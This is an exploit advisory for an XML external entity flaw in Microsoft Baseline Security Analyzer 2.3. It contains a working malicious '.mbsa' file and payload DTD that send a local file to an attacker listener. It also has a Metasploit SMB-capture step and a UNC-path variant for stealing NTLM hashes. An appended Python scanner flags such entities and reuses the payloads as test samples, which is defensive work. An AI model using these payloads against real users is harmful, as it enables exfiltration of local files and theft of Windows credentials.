Microsoft Baseline Security Analyzer 2.3 - XML External Entity Injection
Source: hyp3rlinx.altervista.org  Author: hyp3rlinx  Published: 2018-09-11
# Title: Microsoft Baseline Security Analyzer 2.3 - XML External Entity Injection
# Date: 2018-09-08
# Author: John Page (aka hyp3rlinx)
# Vendor: Microsoft
# Software link: https://www.microsoft.com/en-us/download/details.aspx?id=7558
# Software Version: 2.3
# References: ZDI-CAN-6307
# References: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-BASELINE-ANALYZER-v2.3-XML-INJECTION.txt
# References: hyp3rlinx.altervista.org
 
# Security Issue
# Microsoft Baseline Security Analyzer allows local files to be exfiltrated to a remote
# attacker-controlled server if a user opens a specially crafted ".mbsa" file.
 
# Exploit/POC
 
# Install MBSA
# https://www.microsoft.com/en-us/download/details.aspx?id=7558
 
# 1) "evil.mbsa"
 
<?xml version="1.0"?>
<!DOCTYPE fileppe_fingerz [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
 
# 2) "payload.dtd"
 
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;
 
# When the victim attempts to open the file, they are prompted "Do you want to let this app
# make changes to your device?" However, the prompt also indicates a "verified publisher", namely Microsoft.
# After the file is opened, the local user's files can be exfiltrated to a remote server.
# Moreover, we can use this to steal NTLM hashes.
 
# Using Forced Authentication to steal NTLM hashes
 
# 2) msf > use auxiliary/server/capture/smb
# msf auxiliary(smb) > exploit -j
 
"evil.mbsa"
 
<?xml version="1.0"?>
<!DOCTYPE fileppe_fingerz [
<!ENTITY % dtd SYSTEM "\\192.168.114.153\unknwonfilez">
%dtd;]>
 
# Result: credentials captured by remote server
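
# Added example, not part of the original advisory: a pre-open triage check that lists the
# external entity declarations in a ".mbsa" file and classifies each target as a local file,
# a remote URL or a UNC path. The function names, the benign sample and the
# refuse-any-DOCTYPE policy are assumptions of this example.

```python
import re

# <!ENTITY [%] name SYSTEM "sysid">  or  <!ENTITY [%] name PUBLIC "pubid" "sysid">
EXTERNAL_ENTITY = re.compile(
    r'''<!ENTITY\s+(?P<param>%\s+)?(?P<name>[^\s%]+)\s+
        (?:SYSTEM|PUBLIC\s+(?:"[^"]*"|'[^']*'))\s+
        (?:"(?P<dq>[^"]*)"|'(?P<sq>[^']*)')''', re.VERBOSE)

# The two "evil.mbsa" bodies from the advisory, used only as scanner input.
SAMPLE_OOB = rb'''<?xml version="1.0"?>
<!DOCTYPE fileppe_fingerz [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>'''
SAMPLE_UNC = rb'''<?xml version="1.0"?>
<!DOCTYPE fileppe_fingerz [
<!ENTITY % dtd SYSTEM "\\192.168.114.153\unknwonfilez">
%dtd;]>'''
# Constructed benign file; the element names are hypothetical.
SAMPLE_CLEAN = b'<?xml version="1.0"?><Report><Check id="1"/></Report>'

def decode(raw: bytes) -> str:
    """Decode by BOM so a UTF-16 encoded file is not missed."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16")
    return raw.decode("utf-8-sig", errors="replace")

def classify(target: str) -> str:
    t = target.strip().lower()
    if t.startswith(("\\\\", "//")):
        return "unc"      # SMB path: opening it sends NTLM authentication
    if re.match(r"(https?|ftp)://", t):
        return "remote"   # external DTD fetch or exfiltration URL
    return "local"        # anything else is treated as a local path

def scan(raw: bytes) -> list:
    """Return (name, is_parameter_entity, kind, target) per external entity."""
    findings = []
    for m in EXTERNAL_ENTITY.finditer(decode(raw)):
        target = m.group("dq") if m.group("dq") is not None else m.group("sq")
        findings.append((m.group("name"), bool(m.group("param")),
                         classify(target), target))
    return findings

def should_block(raw: bytes) -> bool:
    """Assumed policy: a report file needs no DTD, so any DOCTYPE is refused."""
    return "<!DOCTYPE" in decode(raw) or bool(scan(raw))
```

# The regex is a triage aid over raw text, not an XML parser; the durable fix is for the
# consuming parser to refuse DTDs and external entity resolution.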
 
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved